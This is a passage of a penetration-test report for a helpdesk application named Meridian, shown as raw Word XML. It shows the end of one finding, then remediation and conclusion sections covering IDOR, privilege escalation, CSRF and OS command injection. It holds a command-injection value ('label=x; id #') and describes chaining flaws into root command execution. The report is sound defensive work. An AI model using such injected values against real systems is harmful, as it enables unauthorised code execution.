        <w:t xml:space="preserve"> queue) with an injected label executes id as root, chaining A1 and Part B in a single request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A944DB" w14:textId="7130CCDE" w:rsidR="00D06737" w:rsidRDefault="00D06737" w:rsidP="00D06737">
      <w:r w:rsidRPr="00D06737">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D06737">
        <w:t>Confirmed</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06737">
        <w:t xml:space="preserve"> the access-control gap and the command injection chain into full remote command execution from a low-privilege account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719BECFA" w14:textId="101AEDBF" w:rsidR="00D06737" w:rsidRDefault="008D159D" w:rsidP="008D159D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3959FE" w14:textId="77777777" w:rsidR="0035608E" w:rsidRDefault="00316D9B" w:rsidP="00316D9B">
      <w:r w:rsidRPr="00316D9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IDOR (A1) and the export’s object check (B5–B7, Finale):</w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483716AD" w14:textId="16C622FF" w:rsidR="00316D9B" w:rsidRPr="00316D9B" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve">Both </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>view_ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>export_ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> fetched the ticket with get_object_or_404(Ticket, id=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>ticket_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve">) and never checked whether the signed-in agent was actually permitted to see it. The fix calls </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>ticket_perm_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>(request, ticket)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t>an existing authorization helper in the codebase (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>HelpdeskUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>request.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>can_access_ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>(ticket))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve">immediately after the ticket is loaded, in both views. It raises </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>PermissionDenied</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> (HTTP 403) unless the agent’s queue permissions cover the ticket’s queue or the ticket is assigned to them. Re-testing GET /tickets/4/ and GET /tickets/4/export/?label=... as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>rmasri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> now returns 403 instead of the ticket content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78156DE7" w14:textId="77777777" w:rsidR="0035608E" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00316D9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege escalation (A2):</w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046DB661" w14:textId="78E6FFF9" w:rsidR="00316D9B" w:rsidRPr="00316D9B" w:rsidRDefault="0035608E" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00316D9B" w:rsidRPr="00316D9B">
        <w:t>romote_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00316D9B" w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> was decorated only with @helpdesk_staff_member_required, which any signed-in agent satisfies. It now requires @helpdesk_superuser_required (plus the matching </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00316D9B" w:rsidRPr="00316D9B">
        <w:t>superuser_required</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00316D9B" w:rsidRPr="00316D9B">
        <w:t>() wrapper already used elsewhere in the codebase for admin-only endpoints), so only an existing administrator can grant superuser rights to another account. A non-admin agent calling /admin-tools/promote/?user=... is now rejected before the view body runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9E1B59" w14:textId="77777777" w:rsidR="0035608E" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00316D9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSRF (A3):</w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA5E4F" w14:textId="50F6EAE4" w:rsidR="00316D9B" w:rsidRPr="00316D9B" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:lastRenderedPageBreak/>
        <w:t>change_email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> was marked @csrf_exempt, explicitly opting the endpoint out of Django’s CSRF protection. Removing that decorator restores the framework’s default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>CsrfViewMiddleware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> for this view, so a POST to /profile/email/ with no valid CSRF token is now rejected rather than processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745331F5" w14:textId="77777777" w:rsidR="0035608E" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00316D9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command injection (B5–B7, Finale):</w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4300E9F2" w14:textId="6B8BFC19" w:rsidR="00316D9B" w:rsidRPr="00316D9B" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>export_ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> built a shell command string by interpolating the caller-supplied label value directly and executed it with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>subprocess.check_output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316D9B">
        <w:t>(command, shell=True, ...). Any shell metacharacter in label ran as a second command. The export’s actual job</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> write a string to a file, then read it back</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t>never needed a shell at all, so the fix removes subprocess entirely and uses plain Python file I/O (open() / write() / read()). As defense in depth, label is also filtered to a safe character set (letters, digits, -, _) before it’s used in the filename, closing off path traversal as well as shell injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419C2A6" w14:textId="3DC06865" w:rsidR="00316D9B" w:rsidRPr="00316D9B" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00316D9B">
        <w:t>All four fixes were verified against the running instance after deployment: label=x; id # against a ticket now either 403s (outside the agent’s queue) or writes a literal file containing the label text (within the agent’s queue)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> never the output of id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762BDB6D" w14:textId="36DC6A79" w:rsidR="008D159D" w:rsidRPr="00D06737" w:rsidRDefault="008D159D" w:rsidP="0035608E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E5BF0" w14:textId="77777777" w:rsidR="00316D9B" w:rsidRPr="00316D9B" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00316D9B">
        <w:t>This assessment confirmed four distinct vulnerabilities in Meridian</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> an IDOR on the ticket detail and export endpoints, a vertical privilege-escalation path through the admin promotion tool, a CSRF-exposed account-email change, and an OS command injection in the ticket export feature</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00316D9B">
        <w:t xml:space="preserve"> and demonstrated their real-world severity by chaining the IDOR and the command injection into root-level command execution from a low-privilege Customer Support account. Each finding was reproduced and captured through Burp Suite, and each traces back to a single root cause: the application trusted client-supplied input (a ticket id, a username, a form submission, a label string) without verifying either who was asking or what that input could do once it reached the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F9DC22" w14:textId="77777777" w:rsidR="00316D9B" w:rsidRPr="008D159D" w:rsidRDefault="00316D9B" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00316D9B">
        <w:t>All four issues were subsequently remediated in src/helpdesk/views/staff.py by adding the missing object-level authorization check, restricting the promotion endpoint to administrators, restoring CSRF protection on the e-mail-change form, and eliminating the shell invocation behind the export feature in favor of safe, direct file I/O. Re-running every attack in this report against the patched code confirmed each one now fails as expected, closing both the individual vulnerabilities and the chained attack path between them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D47C236" w14:textId="77777777" w:rsidR="007F1F8E" w:rsidRPr="007F1F8E" w:rsidRDefault="007F1F8E" w:rsidP="0035608E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007F1F8E" w:rsidRPr="007F1F8E" w:rsidSect="006D56E8">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579"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20B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377B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F008D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3E773A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75C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54B01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E24A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CE490A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FC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B19EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="589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9388B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9C27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365F66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="514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C3875"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60E81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9415BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF1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D751A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80664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24E5463"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="275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A3A0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55088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531625"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66009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475A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="003EB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8544E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28D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536C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8878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992E7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E86AD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A25D28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB140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C471286"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3F2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3956938">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="505553671">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="164974569">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="74596910">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1396781634">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="737750115">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1224877116">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1517302709">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1907766591">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="816410623">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="532957537">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="945380972">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1653175129">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="453450768">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1567960614">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1645043999">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1697777513">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="877624328">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1362129261">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="661932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01"/>
    <w:rsid w:val="00014167"/>
    <w:rsid w:val="00014FF2"/>
    <w:rsid w:val="00015617"/>
    <w:rsid w:val="00017E10"/>
    <w:rsid w:val="0002570E"/>
    <w:rsid w:val="0003083A"/>
    <w:rsid w:val="00031DB8"/>
    <w:rsid w:val="00035FFC"/>
    <w:rsid w:val="00051EB7"/>
    <w:rsid w:val="00056E14"/>
    <w:rsid w:val="00063675"/>
    <w:rsid w:val="00065D94"/>
    <w:rsid w:val="000673A1"/>
    <w:rsid w:val="00067C50"/>
    <w:rsid w:val="00073832"/>
    <w:rsid w:val="00080D18"/>
    <w:rsid w:val="0008463C"/>
    <w:rsid w:val="000B490F"/>
    <w:rsid w:val="000B7A6A"/>
    <w:rsid w:val="000C638C"/>
    <w:rsid w:val="000C7F01"/>
    <w:rsid w:val="000E25B6"/>
    <w:rsid w:val="000F5767"/>
    <w:rsid w:val="001221CA"/>
    <w:rsid w:val="001225CA"/>
    <w:rsid w:val="00126FDD"/>
    <w:rsid w:val="00134079"/>
    <w:rsid w:val="0014095E"/>
    <w:rsid w:val="00146322"/>
    <w:rsid w:val="00147580"/>
    <w:rsid w:val="001610E9"/>
    <w:rsid w:val="0016613B"/>
    <w:rsid w:val="001A6973"/>
    <w:rsid w:val="001B2DF0"/>
    <w:rsid w:val="001B5CC0"/>
    <w:rsid w:val="001B6D66"/>
    <w:rsid w:val="001C09E0"/>
    <w:rsid w:val="001C0D86"/>
    <w:rsid w:val="001C0DED"/>
    <w:rsid w:val="001D0FA2"/>
    <w:rsid w:val="001E4E39"/>
    <w:rsid w:val="001F0E73"/>
    <w:rsid w:val="001F169D"/>
    <w:rsid w:val="00205E75"/>
    <w:rsid w:val="002124A5"/>
    <w:rsid w:val="002217C3"/>
    <w:rsid w:val="00221F48"/>
    <w:rsid w:val="00237F7F"/>
    <w:rsid w:val="00244CB8"/>
    <w:rsid w:val="002539E2"/>
    <w:rsid w:val="0026201F"/>
    <w:rsid w:val="0027169B"/>
    <w:rsid w:val="00274FE8"/>
    <w:rsid w:val="00282431"/>
    <w:rsid w:val="002853AD"/>
    <w:rsid w:val="002862F2"/>
    <w:rsid w:val="00286D92"/>
    <w:rsid w:val="00296343"/>
    <w:rsid w:val="002A491B"/>
    <w:rsid w:val="002E0C53"/>
    <w:rsid w:val="002E6165"/>
    <w:rsid w:val="002F166C"/>
    <w:rsid w:val="002F4850"/>
    <w:rsid w:val="0030529B"/>
    <w:rsid w:val="00314FD3"/>
    <w:rsid w:val="00316D9B"/>
    <w:rsid w:val="003251C6"/>
    <w:rsid w:val="00325926"/>
    <w:rsid w:val="00340A5A"/>
    <w:rsid w:val="00343642"/>
    <w:rsid w:val="00344D2E"/>
    <w:rsid w:val="0035608E"/>
    <w:rsid w:val="00383CB9"/>
    <w:rsid w:val="0039359A"/>
    <w:rsid w:val="003A58FB"/>
    <w:rsid w:val="003E4F45"/>
    <w:rsid w:val="003F6049"/>
    <w:rsid w:val="0040423B"/>
    <w:rsid w:val="0041151F"/>
    <w:rsid w:val="00415336"/>
    <w:rsid w:val="00435EC5"/>
    <w:rsid w:val="00437CCD"/>
    <w:rsid w:val="00437F16"/>
    <w:rsid w:val="00445DEE"/>
    <w:rsid w:val="004473FE"/>
    <w:rsid w:val="00466928"/>
    <w:rsid w:val="0047678D"/>
    <w:rsid w:val="00484952"/>
    <w:rsid w:val="004909E6"/>
    <w:rsid w:val="00491B5F"/>
    <w:rsid w:val="00496923"/>
    <w:rsid w:val="004A0447"/>
    <w:rsid w:val="004A4D58"/>
    <w:rsid w:val="004E1A86"/>
    <w:rsid w:val="004E3C1D"/>
    <w:rsid w:val="004F1611"/>
    <w:rsid w:val="004F69B0"/>
    <w:rsid w:val="00506CC2"/>
    <w:rsid w:val="00512C5D"/>
    <w:rsid w:val="005160F0"/>
    <w:rsid w:val="00533B2E"/>
    <w:rsid w:val="005375F2"/>
    <w:rsid w:val="00541719"/>
    <w:rsid w:val="00541FA9"/>
    <w:rsid w:val="00553D35"/>
    <w:rsid w:val="005573CF"/>
    <w:rsid w:val="00560F8C"/>
    <w:rsid w:val="00590F19"/>
    <w:rsid w:val="00592BEC"/>
    <w:rsid w:val="00594BD9"/>
    <w:rsid w:val="005C4642"/>
    <w:rsid w:val="005D14B6"/>
    <w:rsid w:val="005D3D36"/>
    <w:rsid w:val="005D4344"/>
    <w:rsid w:val="005D6A12"/>
    <w:rsid w:val="005E30A5"/>
    <w:rsid w:val="005E78FE"/>
    <w:rsid w:val="005F38D4"/>
    <w:rsid w:val="005F5467"/>
    <w:rsid w:val="005F5660"/>
    <w:rsid w:val="005F6AA9"/>
    <w:rsid w:val="006005A5"/>
    <w:rsid w:val="006073DC"/>
    <w:rsid w:val="00607C00"/>
    <w:rsid w:val="00611F65"/>
    <w:rsid w:val="0062254C"/>
    <w:rsid w:val="0063515D"/>
    <w:rsid w:val="00652705"/>
    <w:rsid w:val="00654D78"/>
    <w:rsid w:val="00657934"/>
    <w:rsid w:val="00665201"/>
    <w:rsid w:val="0067747B"/>
    <w:rsid w:val="00693F73"/>
    <w:rsid w:val="006A3676"/>
    <w:rsid w:val="006A4D55"/>
    <w:rsid w:val="006B2746"/>
    <w:rsid w:val="006B6659"/>
    <w:rsid w:val="006D56E8"/>
    <w:rsid w:val="006E29C8"/>
    <w:rsid w:val="006E477B"/>
    <w:rsid w:val="006F3D0B"/>
    <w:rsid w:val="006F52DE"/>
    <w:rsid w:val="006F5B12"/>
    <w:rsid w:val="007101C9"/>
    <w:rsid w:val="00713F64"/>
    <w:rsid w:val="007231B9"/>
    <w:rsid w:val="007364D2"/>
    <w:rsid w:val="00762AF6"/>
    <w:rsid w:val="0076327A"/>
    <w:rsid w:val="00765509"/>
    <w:rsid w:val="0076637F"/>
    <w:rsid w:val="00771CB7"/>
    <w:rsid w:val="0077775B"/>
    <w:rsid w:val="0078107E"/>
    <w:rsid w:val="0079229B"/>
    <w:rsid w:val="007A01EA"/>
    <w:rsid w:val="007A497C"/>
    <w:rsid w:val="007B5E2B"/>
    <w:rsid w:val="007B74C1"/>
    <w:rsid w:val="007C491F"/>
    <w:rsid w:val="007D2553"/>
    <w:rsid w:val="007D607C"/>
    <w:rsid w:val="007E5FF2"/>
    <w:rsid w:val="007E732A"/>
    <w:rsid w:val="007F1F8E"/>
    <w:rsid w:val="007F4E01"/>
    <w:rsid w:val="0080086B"/>
    <w:rsid w:val="00801B93"/>
    <w:rsid w:val="008025BD"/>
    <w:rsid w:val="00805B5C"/>
    <w:rsid w:val="008118FE"/>
    <w:rsid w:val="00813600"/>
    <w:rsid w:val="0083121F"/>
    <w:rsid w:val="008466A0"/>
    <w:rsid w:val="00851EF7"/>
    <w:rsid w:val="00864A2E"/>
    <w:rsid w:val="0087251F"/>
    <w:rsid w:val="00892AD2"/>
    <w:rsid w:val="0089596F"/>
    <w:rsid w:val="008A1704"/>
    <w:rsid w:val="008A410C"/>
    <w:rsid w:val="008A7B6B"/>
    <w:rsid w:val="008B0D32"/>
    <w:rsid w:val="008B1BC4"/>
    <w:rsid w:val="008D159D"/>
    <w:rsid w:val="008D75CF"/>
    <w:rsid w:val="008E7C7C"/>
    <w:rsid w:val="008F0EA2"/>
    <w:rsid w:val="008F1A82"/>
    <w:rsid w:val="008F3828"/>
    <w:rsid w:val="008F700D"/>
    <w:rsid w:val="00927209"/>
    <w:rsid w:val="00934C91"/>
    <w:rsid w:val="00935C7D"/>
    <w:rsid w:val="00942FD3"/>
    <w:rsid w:val="00952796"/>
    <w:rsid w:val="0096138D"/>
    <w:rsid w:val="00982F7E"/>
    <w:rsid w:val="0098423B"/>
    <w:rsid w:val="00992B66"/>
    <w:rsid w:val="009A5A07"/>
    <w:rsid w:val="009D26DD"/>
    <w:rsid w:val="009F1A76"/>
    <w:rsid w:val="009F58A3"/>
    <w:rsid w:val="009F5FE9"/>
    <w:rsid w:val="009F6AA8"/>
    <w:rsid w:val="009F6B17"/>
    <w:rsid w:val="00A060CA"/>
    <w:rsid w:val="00A132E0"/>
    <w:rsid w:val="00A460E9"/>
    <w:rsid w:val="00A530D2"/>
    <w:rsid w:val="00A53D37"/>
    <w:rsid w:val="00A76923"/>
    <w:rsid w:val="00A85222"/>
    <w:rsid w:val="00A87459"/>
    <w:rsid w:val="00A9088E"/>
    <w:rsid w:val="00A961B2"/>
    <w:rsid w:val="00AD00C5"/>
    <w:rsid w:val="00AD40BF"/>
    <w:rsid w:val="00AF1032"/>
    <w:rsid w:val="00AF1B5D"/>
    <w:rsid w:val="00B02B67"/>
    <w:rsid w:val="00B1268E"/>
    <w:rsid w:val="00B16274"/>
    <w:rsid w:val="00B303E0"/>
    <w:rsid w:val="00B54783"/>
    <w:rsid w:val="00B70C1F"/>
    <w:rsid w:val="00B7144B"/>
    <w:rsid w:val="00B72DE6"/>
    <w:rsid w:val="00B73F61"/>
    <w:rsid w:val="00B7478D"/>
    <w:rsid w:val="00BA29BE"/>
    <w:rsid w:val="00BB0151"/>
    <w:rsid w:val="00BC6B00"/>
    <w:rsid w:val="00BE56D1"/>
    <w:rsid w:val="00BF0D6E"/>
    <w:rsid w:val="00BF53F6"/>
    <w:rsid w:val="00C10CCA"/>
    <w:rsid w:val="00C12DE2"/>
    <w:rsid w:val="00C16241"/>
    <w:rsid w:val="00C22C5B"/>
    <w:rsid w:val="00C22DC5"/>
    <w:rsid w:val="00C23CFE"/>
    <w:rsid w:val="00C24D56"/>
    <w:rsid w:val="00C551D6"/>
    <w:rsid w:val="00C55D83"/>
    <w:rsid w:val="00C570FB"/>
    <w:rsid w:val="00C6595A"/>
    <w:rsid w:val="00C711CC"/>
    <w:rsid w:val="00C75D26"/>
    <w:rsid w:val="00C87BB2"/>
    <w:rsid w:val="00C90AEF"/>
    <w:rsid w:val="00C956ED"/>
    <w:rsid w:val="00CA2A35"/>
    <w:rsid w:val="00CC2512"/>
    <w:rsid w:val="00CD1ADE"/>
    <w:rsid w:val="00CD43F2"/>
    <w:rsid w:val="00CD5A2C"/>
    <w:rsid w:val="00CD5DCF"/>
    <w:rsid w:val="00CE58DF"/>
    <w:rsid w:val="00D02A2C"/>
    <w:rsid w:val="00D065F9"/>
    <w:rsid w:val="00D06737"/>
    <w:rsid w:val="00D148A8"/>
    <w:rsid w:val="00D20547"/>
    <w:rsid w:val="00D20885"/>
    <w:rsid w:val="00D20F81"/>
    <w:rsid w:val="00D227B5"/>
    <w:rsid w:val="00D25282"/>
    <w:rsid w:val="00D26CD4"/>
    <w:rsid w:val="00D358C4"/>
    <w:rsid w:val="00D377B3"/>
    <w:rsid w:val="00D73A5C"/>
    <w:rsid w:val="00D80857"/>
    <w:rsid w:val="00D83108"/>
    <w:rsid w:val="00D911A1"/>
    <w:rsid w:val="00DB5E95"/>
    <w:rsid w:val="00DB65B6"/>
    <w:rsid w:val="00DC142C"/>
    <w:rsid w:val="00DD112A"/>
    <w:rsid w:val="00DE6A7B"/>
    <w:rsid w:val="00E02BC3"/>
    <w:rsid w:val="00E12E7D"/>
    <w:rsid w:val="00E21894"/>
    <w:rsid w:val="00E2541B"/>
    <w:rsid w:val="00E37598"/>
    <w:rsid w:val="00E4438C"/>
    <w:rsid w:val="00E507BA"/>
    <w:rsid w:val="00E52B9E"/>
    <w:rsid w:val="00E600D8"/>
    <w:rsid w:val="00E60E4E"/>
    <w:rsid w:val="00E64B98"/>
    <w:rsid w:val="00E67987"/>
    <w:rsid w:val="00E70A0C"/>
    <w:rsid w:val="00E71DDB"/>
    <w:rsid w:val="00E736E2"/>
    <w:rsid w:val="00E73EB3"/>
    <w:rsid w:val="00E7575C"/>
    <w:rsid w:val="00EB6E69"/>
    <w:rsid w:val="00EB7477"/>
    <w:rsid w:val="00EC2774"/>
    <w:rsid w:val="00ED5BAB"/>
    <w:rsid w:val="00EE142C"/>
    <w:rsid w:val="00EE2D2A"/>
    <w:rsid w:val="00EF0BBD"/>
    <w:rsid w:val="00EF2200"/>
    <w:rsid w:val="00EF37E3"/>
    <w:rsid w:val="00EF3E11"/>
    <w:rsid w:val="00F02F04"/>
    <w:rsid w:val="00F11099"/>
    <w:rsid w:val="00F1729A"/>
    <w:rsid w:val="00F35864"/>
    <w:rsid w:val="00F414EF"/>
    <w:rsid w:val="00F433C5"/>
    <w:rsid w:val="00F6272F"/>
    <w:rsid w:val="00F74EAE"/>
    <w:rsid w:val="00F7561E"/>
    <w:rsid w:val="00F83CB4"/>
    <w:rsid w:val="00F911E5"/>
    <w:rsid w:val="00FA7287"/>
    <w:rsid w:val="00FC01A3"/>
